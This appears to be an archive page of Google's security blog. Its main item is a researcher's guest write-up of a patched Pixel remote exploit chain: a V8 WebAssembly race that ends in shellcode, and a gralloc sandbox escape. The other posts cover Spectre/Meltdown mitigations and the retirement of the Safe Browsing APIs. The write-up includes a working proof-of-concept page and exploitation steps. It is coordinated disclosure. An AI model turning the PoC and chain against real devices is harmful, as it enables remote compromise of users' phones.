Announcing turndown of the deprecated Google Safe Browsing APIs

January 24, 2018

Posted by Alex Wozniak, Software Engineer, Safe Browsing Team
In May 2016, we introduced the latest version of the Google Safe Browsing API (v4). Since this launch, thousands of developers around the world have adopted the API to protect over 3 billion devices from unsafe web resources.

Coupled with that announcement was the deprecation of legacy Safe Browsing APIs, v2 and v3. Today we are announcing an official turn-down date of October 1st, 2018, for these APIs. All v2 and v3 clients must transition to the v4 API prior to this date.

To make the switch easier, an open source implementation of the Update API (v4) is available on GitHub. Android developers always get the latest version of Safe Browsing’s data and protocols via the SafetyNet Safe Browsing API. Getting started is simple; all you need is a Google Account, Google Developer Console project, and an API key.

For questions or feedback, join the discussion with other developers on the Safe Browsing Google Group. Visit our website for the latest information on Safe Browsing.

Android Security Ecosystem Investments Pay Dividends for Pixel

January 17, 2018

Posted by Mayank Jain and Scott Roberts, Android security team

[Cross-posted from the Android Developers Blog]

In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues.
All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation.
The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University.
The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.

Technical details of a Pixel remote exploit chain

The Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process.
This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys).

The RCE bug (CVE-2017-5116)

New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access.
The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time.

i::wasm::ModuleWireBytes GetFirstArgumentAsBytes(
    const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) {
  ......
  } else if (source->IsTypedArray()) {    //--->source should be checked if it's backed by a SharedArrayBuffer
    // A TypedArray was passed.
    Local<TypedArray> array = Local<TypedArray>::Cast(source);
    Local<ArrayBuffer> buffer = array->Buffer();
    ArrayBuffer::Contents contents = buffer->GetContents();
    start =
        reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset();
    length = array->ByteLength();
  } 
  ......
  return i::wasm::ModuleWireBytes(start, start + length);
}

A simple PoC is as follows:

<html>
<h1>poc</h1>
<script id="worker1">
worker:{
       self. {
        console.log("worker started");
        var ta = new Uint8Array(arg.data);
        var i =0;
        while(1){
            if(i==0){
                i=1;
                ta[51]=0;   //--->4)modify the webassembly code at the same time
            }else{
                i=0;
                ta[51]=128;
            }
        }
    }
}
</script>
<script>
function getSharedTypedArray(){
    var wasmarr = [
        0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
        0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03,
        0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e,
        0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65,
        0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01,
        0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b,
        0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b];
    var sb = new SharedArrayBuffer(wasmarr.length);           //---> 1)put WebAssembly code in a SharedArrayBuffer
    var sta = new Uint8Array(sb);
    for(var i=0;i<sta.length;i++)
        sta[i]=wasmarr[i];
    return sta;    
}
var blob = new Blob([
        document.querySelector('#worker1').textContent
        ], { type: "text/javascript" })
var worker = new Worker(window.URL.createObjectURL(blob));   //---> 2)create a web worker
var sta = getSharedTypedArray();
worker.postMessage(sta.buffer);                              //--->3)pass the WebAssembly code to the web worker
setTimeout(function(){
        while(1){
        try{
        sta[51]=0;
        var myModule = new WebAssembly.Module(sta);          //--->4)parse the WebAssembly code
        var myInstance = new WebAssembly.Instance(myModule);
        //myInstance.exports.getAnswerPlus1();
        }catch(e){
        }
        }
    },1000);
//worker.terminate(); 
</script>
</html>

The text format of the WebAssembly code is as follows:

00002b func[0]:
00002d: 41 2a                      | i32.const 42
00002f: 0b                         | end
000030 func[1]:
000032: 10 00                      | call 0
000034: 41 01                      | i32.const 1
000036: 6a                         | i32.add
000037: 0b                         | end

First, the above binary format WebAssembly code is put into a SharedArrayBuffer, then a TypedArray Object is created, using the SharedArrayBuffer as buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly Code, the worker thread modifies the SharedArrayBuffer at the same time. Under this circumstance, a race condition causes a TOCTOU issue. After the main thread's bound check, the instruction " call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs.
Because the "call 0" Web Assembly instruction can be modified to call any other Web Assembly functions, the exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped to Web Assembly memory. Because function 0 and function $leak have a different number of arguments, this results in many useful pieces of data in the stack being leaked.

 (func $leak(param i32 i32 i32 i32 i32 i32)(result i32)
    i32.const 0
    get_local 0
    i32.store
    i32.const 4
    get_local 1
    i32.store
    i32.const 8
    get_local 2
    i32.store
    i32.const 12
    get_local 3
    i32.store
    i32.const 16
    get_local 4
    i32.store
    i32.const 20
    get_local 5
    i32.store
    i32.const 0
  ))

Not only the instruction "call 0" can be modified, any "call funcx" instruction can be modified. Assume funcx is a wasm function with 6 arguments as follows, when v8 compiles funcx in ia32 architecture, the first 5 arguments are passed through the registers and the sixth argument is passed through stack. All the arguments can be set to any value by JavaScript:

/*Text format of funcx*/
 (func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32)
    get_local 5
    get_local 4
    i32.add)
/*Disassembly code of funcx*/
--- Code ---
kind = WASM_FUNCTION
name = wasm#1
compiler = turbofan
Instructions (size = 20)
0x58f87600     0  8b442404       mov eax,[esp+0x4]
0x58f87604     4  03c6           add eax,esi
0x58f87606     6  c20400         ret 0x4
0x58f87609     9  0f1f00         nop
Safepoints (size = 8)
RelocInfo (size = 0)
--- End code ---

When a JavaScript function calls a WebAssembly function, v8 compiler creates a JS_TO_WASM function internally, after compilation, the JavaScript function will call the created JS_TO_WASM function and then the created JS_TO_WASM function will call the WebAssembly function. JS_TO_WASM functions use different call convention, its first arguments is passed through stack. If "call funcx" is modified to call the following JS_TO_WASM function.

/*Disassembly code of JS_TO_WASM function */
--- Code ---
kind = JS_TO_WASM_FUNCTION
name = js-to-wasm#0
compiler = turbofan
Instructions (size = 170)
0x4be08f20     0  55             push ebp
0x4be08f21     1  89e5           mov ebp,esp
0x4be08f23     3  56             push esi
0x4be08f24     4  57             push edi
0x4be08f25     5  83ec08         sub esp,0x8
0x4be08f28     8  8b4508         mov eax,[ebp+0x8]
0x4be08f2b     b  e8702e2bde     call 0x2a0bbda0  (ToNumber)    ;; code: BUILTIN
0x4be08f30    10  a801           test al,0x1
0x4be08f32    12  0f852a000000   jnz 0x4be08f62  <+0x42>

The JS_TO_WASM function will take the sixth arguments of funcx as its first argument, but it takes its first argument as an object pointer, so type confusion will be triggered when the argument is passed to the ToNumber function, which means we can pass any values as an object pointer to the ToNumber function. So we can fake an ArrayBuffer object in some address such as in a double array and pass the address to ToNumber. The layout of an ArrayBuffer is as follows:

/* ArrayBuffer layouts 40 Bytes*/                                                                                                                         
Map                                                                                                                                                       
Properties                                                                                                                                                
Elements                                                                                                                                                  
ByteLength                                                                                                                                                
BackingStore                                                                                                                                              
AllocationBase                                                                                                                                            
AllocationLength                                                                                                                                          
Fields                                                                                                                                                    
internal                                                                                                                                                  
internal                                                                                                                                                                                                                                                                                                      
/* Map layouts 44 Bytes*/                                                                                                                                   
static kMapOffset = 0,                                                                                                                                    
static kInstanceSizesOffset = 4,                                                                                                                          
static kInstanceAttributesOffset = 8,                                                                                                                     
static kBitField3Offset = 12,                                                                                                                             
static kPrototypeOffset = 16,                                                                                                                             
static kConstructorOrBackPointerOffset = 20,                                                                                                              
static kTransitionsOrPrototypeInfoOffset = 24,                                                                                                            
static kDescriptorsOffset = 28,                                                                                                                           
static kLayoutDescriptorOffset = 1,                                                                                                                       
static kCodeCacheOffset = 32,                                                                                                                             
static kDependentCodeOffset = 36,                                                                                                                         
static kWeakCellCacheOffset = 40,                                                                                                                         
static kPointerFieldsBeginOffset = 16,                                                                                                                    
static kPointerFieldsEndOffset = 44,                                                                                                                      
static kInstanceSizeOffset = 4,                                                                                                                           
static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5,                                                                                           
static kUnusedOffset = 6,                                                                                                                                 
static kVisitorIdOffset = 7,                                                                                                                              
static kInstanceTypeOffset = 8,     //one byte                                                                                                            
static kBitFieldOffset = 9,                                                                                                                               
static kInstanceTypeAndBitFieldOffset = 8,                                                                                                                
static kBitField2Offset = 10,                                                                                                                             
static kUnusedPropertyFieldsOffset = 11

Because the content of the stack can be leaked, we can get many useful data to fake the ArrayBuffer. For example, we can leak the start address of an object, and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer's properties and elements fields. We have to fake the map of the ArrayBuffer too, luckily, most of the fields of the map are not used when the bug is triggered. But the InstanceType in offset 8 has to be set to 0xc3(this value depends on the version of v8) to indicate this object is an ArrayBuffer. In order to get a reference of the faked ArrayBuffer in JavaScript, we have to set the Prototype field of Map in offset 16 to an object whose Symbol.toPrimitive property is a JavaScript call back function. When the faked array buffer is passed to the ToNumber function, to convert the ArrayBuffer object to a Number, the call back function will be called, so we can get a reference of the faked ArrayBuffer in the call back function. Because the ArrayBuffer is faked in a double array, the content of the array can be set to any value, so we can change the field BackingStore and ByteLength of the faked array buffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple. As JIT Code in Chrome is readable, writable and executable, we can overwrite it to execute shellcode.
Chrome team fixed this bug very quickly in chrome 61.0.3163.79, just a week after I submitted the exploit.

The EoP Bug (CVE-2017-14904)

The sandbox escape bug is caused by map and unmap mismatch, which causes a Use-After-Unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap:

static int gralloc_map(gralloc_module_t const* module,
                       buffer_handle_t handle)
{ ……
    private_handle_t* hnd = (private_handle_t*)handle;
    ……
    if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) &&
        !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) {
        size = hnd->size;
        err = memalloc->map_buffer(&mappedAddress, size,
                                       hnd->offset, hnd->fd);        //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process.
        if(err || mappedAddress == MAP_FAILED) {
            ALOGE("Could not mmap handle %p, fd=%d (%s)",
                  handle, hnd->fd, strerror(errno));
            return -errno;
        }
        hnd->base = uint64_t(mappedAddress) + hnd->offset;          //---> save mappedAddress+offset to hnd->base
    } else {
        err = -EACCES;
}
……
    return err;
}

gralloc_map maps a graphic buffer controlled by the arguments handle to memory space and gralloc_unmap unmaps it. While mapping, the mappedAddress plus hnd->offset is stored to hnd->base, but while unmapping, hnd->base is passed to system call unmap directly minus the offset. hnd->offset can be manipulated from a Chrome's sandboxed process, so it's possible to unmap any pages in system_server from Chrome's sandboxed render process.

static int gralloc_unmap(gralloc_module_t const* module,
                         buffer_handle_t handle)
{
  ……
    if(hnd->base) {
        err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset);    //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched.
        if (err) {
            ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base,
                    strerror(errno));
            return -errno;
        }
        hnd->base = 0;
}
……
    return 0;
}
int IonAlloc::unmap_buffer(void *base, unsigned int size,
        unsigned int /*offset*/)                              
//---> look, offset is not used by unmap_buffer
{
    int err = 0;
    if(munmap(base, size)) {
        err = -errno;
        ALOGE("ion: Failed to unmap memory at %p : %s",
              base, strerror(errno));
    }
    return err;
}

Although SeLinux restricts the domain isolated_app to access most of Android system service, isolated_app can still access three Android system services.

52neverallow isolated_app {
53    service_manager_type
54    -activity_service
55    -display_service
56    -webviewupdate_service
57}:service_manager find;

To trigger the aforementioned Use-After-Unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parseable into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered.
This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app.
To exploit this EoP bug:
1. Address space shaping. Make the address space layout look as follows, a heap chunk is right above some continuous ashmem mapping:

7f54600000-7f54800000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f58000000-7f54a00000 rw-s 001fe000 00:04 32783         /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781         /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779         /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777         /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775         /dev/ashmem/360alpha25 (deleted)
......

2. Unmap part of the heap (1 KB) and part of an ashmem memory (2MB–1KB) by triggering the bug:

7f54400000-7f54600000 rw-s 00000000 00:04 31603         /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
//--->There is a 2MB memory gap
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

3. Fill the unmapped space with an ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603      /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0         [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605       /dev/ashmem/360alpha1001 (deleted)  
//--->The gap is filled with the ashmem memory 360alpha1001
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783      /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781      /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779      /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777      /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775      /dev/ashmem/360alpha25 (deleted)

4. Spray the heap and the heap data will be written to the ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603        /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605          /dev/ashmem/360alpha1001 (deleted)
//--->the heap manager believes the memory range from 0x7f547ff000 to 0x7f54800000 is still mongered by it and will allocate memory from this range, result in heap data is written to ashmem memory
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

5. Because the filled ashmem in step 3 is mapped both by system_server and render process, part of the heap of system_server can be read and written by render process and we can trigger system_server to allocate some GraphicBuffer object in ashmem. As GraphicBuffer is inherited from ANativeWindowBuffer, which has a member named common whose type is android_native_base_t, we can read two function points (incRef and decRef) from ashmem memory and then can calculate the base address of the module libui. In the latest Pixel device, Chrome's render process is still 32-bit process but system_server is 64-bit process. So we have to leak some module's base address for ROP. Now that we have the base address of libui, the last step is to trigger ROP. Unluckily, it seems that the points incRef and decRef haven't been used. It's impossible to modify it to jump to ROP, but we can modify the virtual table of GraphicBuffer to trigger ROP.

typedef struct android_native_base_t
{
    /* a magic value defined by the actual EGL native type */
    int magic;
    /* the sizeof() of the actual EGL native type */
    int version;
    void* reserved[4];
    /* reference-counting interface */
    void (*incRef)(struct android_native_base_t* base);
    void (*decRef)(struct android_native_base_t* base);
} android_native_base_t;

6.Trigger a GC to execute ROP
When a GraphicBuffer object is deconstructed, the virtual function onLastStrongRef is called, so we can replace this virtual function to jump to ROP. When GC happens, the control flow goes to ROP. Finding an ROP chain in limited module(libui) is challenging, but after hard work, we successfully found one and dumped the contents of the file into /data/misc/wifi/wpa_supplicant.conf .

Summary

The Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 Security Update. Supported Google device and devices with the security patch level of 2017-12-05 or later address these issues. While parsing untrusted parcels still happens in sensitive locations, the Android security team is working on hardening the platform to mitigate against similar vulnerabilities.
The EoP bug was discovered thanks to a joint effort between 360 Alpha Team and 360 C0RE Team. Thanks very much for their effort.

More details about mitigations for the CPU Speculative Execution issue

January 4, 2018

Posted by Matt Linton, Senior Security Engineer and Pat Parseghian, Technical Program Manager

Yesterday, Google’s Project Zero team posted detailed technical information on three variants of a new security issue involving speculative execution on many modern CPUs. Today, we’d like to share some more information about our mitigations and performance.

In response to the vulnerabilities that were discovered we developed a novel mitigation called “Retpoline” -- a binary modification technique that protects against “branch target injection” attacks. We shared Retpoline with our industry partners and have deployed it on Google’s systems, where we have observed negligible impact on performance.

In addition, we have deployed Kernel Page Table Isolation (KPTI) -- a general purpose technique for better protecting sensitive information in memory from other software running on a machine -- to the entire fleet of Google Linux production servers that support all of our products, including Search, Gmail, YouTube, and Google Cloud Platform.

There has been speculation that the deployment of KPTI causes significant performance slowdowns. Performance can vary, as the impact of the KPTI mitigations depends on the rate of system calls made by an application. On most of our workloads, including our cloud infrastructure, we see negligible impact on performance.

In our own testing, we have found that microbenchmarks can show an exaggerated impact. Of course, Google recommends thorough testing in your environment before deployment; we cannot guarantee any particular performance or operational impact.

Speculative Execution and the Three Methods of Attack

In addition, to follow up on yesterday’s post, today we’re providing a summary of speculative execution and how each of the three variants work.

In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.

Project Zero discussed three variants of speculative execution attack. There is no single fix for all three attack variants; each requires protection independently.

Variant 1 (CVE-2017-5753), “bounds check bypass.” This vulnerability affects specific sequences within compiled applications, which must be addressed on a per-binary basis.
Variant 2 (CVE-2017-5715), “branch target injection”. This variant may either be fixed by a CPU microcode update from the CPU vendor, or by applying a software mitigation technique called “Retpoline” to binaries where concern about information leakage is present. This mitigation may be applied to the operating system kernel, system programs and libraries, and individual software programs, as needed.
Variant 3 (CVE-2017-5754), “rogue data cache load.” This may require patching the system’s operating system. For Linux there is a patchset called KPTI (Kernel Page Table Isolation) that helps mitigate Variant 3. Other operating systems may implement similar protections - check with your vendor for specifics.

Summary	Mitigation
Variant 1: bounds check bypass (CVE-2017-5753)
This attack variant allows malicious code to circumvent bounds checking features built into most binaries. Even though the bounds checks will still fail, the CPU will speculatively execute instructions after the bounds checks, which can access memory that the code could not normally access. When the CPU determines the bounds check has failed, it discards any work that was done speculatively; however, some changes to the system can be still observed (in particular, changes to the state of the CPU caches). The malicious code can detect these changes and read the data that was speculatively accessed. The primary ramification of Variant 1 is that it is difficult for a system to run untrusted code within a process and restrict what memory within the process the untrusted code can access. In the kernel, this has implications for systems such as the extended Berkeley Packet Filter (eBPF) that takes packet filterers from user space code, just-in-time (JIT) compiles the packet filter code, and runs the packet filter within the context of kernel. The JIT compiler uses bounds checking to limit the memory the packet filter can access, however, Variant 1 allows an attacker to use speculation to circumvent these limitations.	Mitigation requires analysis and recompilation so that vulnerable binary code is not emitted. Examples of targets which may require patching include the operating system and applications which execute untrusted code.
Variant 2: branch target injection (CVE-2017-5715)
This attack variant uses the ability of one process to influence the speculative execution behavior of code in another security context (i.e., guest/host mode, CPU ring, or process) running on the same physical CPU core. Modern processors predict the destination for indirect jumps and calls that a program may take and start speculatively executing code at the predicted location. The tables used to drive prediction are shared between processes running on a physical CPU core, and it is possible for one process to pollute the branch prediction tables to influence the branch prediction of another process or kernel code. In this way, an attacker can cause speculative execution of any mapped code in another process, in the hypervisor, or in the kernel, and potentially read data from the other protection domain using techniques like Variant 1. This variant is difficult to use, but has great potential power as it crosses arbitrary protection domains.	Mitigating this attack variant requires either installing and enabling a CPU microcode update from the CPU vendor (e.g., Intel's IBRS microcode), or applying a software mitigation (e.g., Google's Retpoline) to the hypervisor, operating system kernel, system programs and libraries, and user applications.
Variant 3: rogue data cache load (CVE-2017-5754)
This attack variant allows a user mode process to access virtual memory as if the process was in kernel mode. On some processors, the speculative execution of code can access memory that is not typically visible to the current execution mode of the processor; i.e., a user mode program may speculatively access memory as if it were running in kernel mode. Using the techniques of Variant 1, a process can observe the memory that was accessed speculatively. On most operating systems today, the page table that a process uses includes access to most physical memory on the system, however access to such memory is limited to when the process is running in kernel mode. Variant 3 enables access to such memory even in user mode, violating the protections of the hardware.	Mitigating this attack variant requires patching the operating system. For Linux, the patchset that mitigates Variant 3 is called Kernel Page Table Isolation (KPTI). Other operating systems/providers should implement similar mitigations.

Mitigations for Google products

You can learn more about mitigations that have been applied to Google’s infrastructure, products, and services here.

Today's CPU vulnerability: what you need to know

January 3, 2018

Posted by Matt Linton, Senior Security Engineer and Pat Parseghian, Technical Program Manager

[Google Cloud, G Suite, and Chrome customers can visit the Google Cloud blog for details about those products]
[For more technical details about this issue, please read Project Zero's blog post]

Last year, Google’s Project Zero team discovered serious security flaws caused by “speculative execution,” a technique used by most modern processors (CPUs) to optimize performance.

The Project Zero researcher, Jann Horn, demonstrated that malicious actors could take advantage of speculative execution to read system memory that should have been inaccessible. For example, an unauthorized party may read sensitive information in the system’s memory such as passwords, encryption keys, or sensitive information open in applications. Testing also showed that an attack running on one virtual machine was able to access the physical memory of the host machine, and through that, gain read-access to the memory of a different virtual machine on the same host.

These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running on them.

As soon as we learned of this new class of attack, our security and product development teams mobilized to defend Google’s systems and our users’ data. We have updated our systems and affected products to protect against this new type of attack. We also collaborated with hardware and software manufacturers across the industry to help protect their users and the broader web. These efforts have included collaborative analysis and the development of novel mitigations.

We are posting before an originally coordinated disclosure date of January 9, 2018 because of existing public reports and growing speculation in the press and security research community about the issue, which raises the risk of exploitation. The full Project Zero report is forthcoming (update: this has been published; see above).

Mitigation status for Google products

A list of affected Google products and their current status of mitigation against this attack appears here. As this is a new class of attack, our patch status refers to our mitigation for currently known vectors for exploiting the flaw. The issue has been mitigated in many products (or wasn’t a vulnerability in the first place). In some instances, users and customers may need to take additional steps to ensure they’re using a protected version of a product. This list and a product’s status may change as new developments warrant. In the case of new developments, we will post updates to this blog.

All Google products not explicitly listed below require no user or customer action.
Android

Devices with the latest security update are protected. Furthermore, we are unaware of any successful reproduction of this vulnerability that would allow unauthorized information disclosure on ARM-based Android devices.
Supported Nexus and Pixel devices with the latest security update are protected.
Further information is available here.

Google Apps / G Suite (Gmail, Calendar, Drive, Sites, etc.):

No additional user or customer action needed.

Google Chrome

Some user or customer action needed. More information here.

Google Chrome OS (e.g., Chromebooks):

Some additional user or customer action needed. More information here.

Google Cloud Platform

Google App Engine: No additional customer action needed.
Google Compute Engine: Some additional customer action needed. More information here.
Google Kubernetes Engine: Some additional customer action needed. More information here.
Google Cloud Dataflow: Some additional customer action needed. More information here.
Google Cloud Dataproc: Some additional customer action needed. More information here.
All other Google Cloud products and services: No additional action needed.

Google Home / Chromecast:

No additional user action needed.

Google Wifi/OnHub:

No additional user action needed.

Multiple methods of attack

To take advantage of this vulnerability, an attacker first must be able to run malicious code on the targeted system.

The Project Zero researchers discovered three methods (variants) of attack, which are effective under different conditions. All three attack variants can allow a process with normal user privileges to perform unauthorized reads of memory data, which may contain sensitive information such as passwords, cryptographic key material, etc.

In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.

There is no single fix for all three attack variants; each requires protection independently. Many vendors have patches available for one or more of these attacks.

We will continue our work to mitigate these vulnerabilities and will update both our product support page and this blog post as we release further fixes. More broadly, we appreciate the support and involvement of all the partners and Google engineers who worked tirelessly over the last few months to make our users and customers safe.

Blog post update log

Added link to Project Zero blog
Added link to Google Cloud blog

Security Blog